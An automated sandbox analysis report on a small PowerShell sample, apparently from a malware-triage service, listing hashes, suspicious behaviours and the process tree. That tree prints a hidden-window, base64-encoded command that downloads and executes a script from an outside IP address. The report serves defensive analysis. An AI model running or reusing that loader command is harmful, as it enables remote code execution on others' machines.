Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-01-2025 18:13
Static task
static1
Behavioral task
behavioral1
Sample
2 ps1.ps1
Resource
win7-20240903-en
General
-
Target
2 ps1.ps1
-
Size
164B
-
MD5
005b395fecc3e18d5bc9acb93bf96a4f
-
SHA1
34db5ff90015817fe8b2fe56ca241d6965ae95d4
-
SHA256
5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
-
SHA512
199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2228 powershell.exe 2244 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2244 powershell.exe 2228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2228 2244 powershell.exe 31 PID 2244 wrote to memory of 2228 2244 powershell.exe 31 PID 2244 wrote to memory of 2228 2244 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\2 ps1.ps1"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD570fbd46493e7deb9c30396e9ece60452
SHA14c5a870833fb5f9fccc7048135850c95a28887fb
SHA256fea2f70868cbdb2cef7fd2cdcd965145894e12954d4a2ff53e08ac6c09d8468c
SHA5120f8fc2a187d7b575e2c4df0a8087e6baa8634ca16a889170f26a0e882d07ee62ab3db0e6d43216ad9215d093f7faef3725a21c47bcdaf8e988be0dd6b4426db0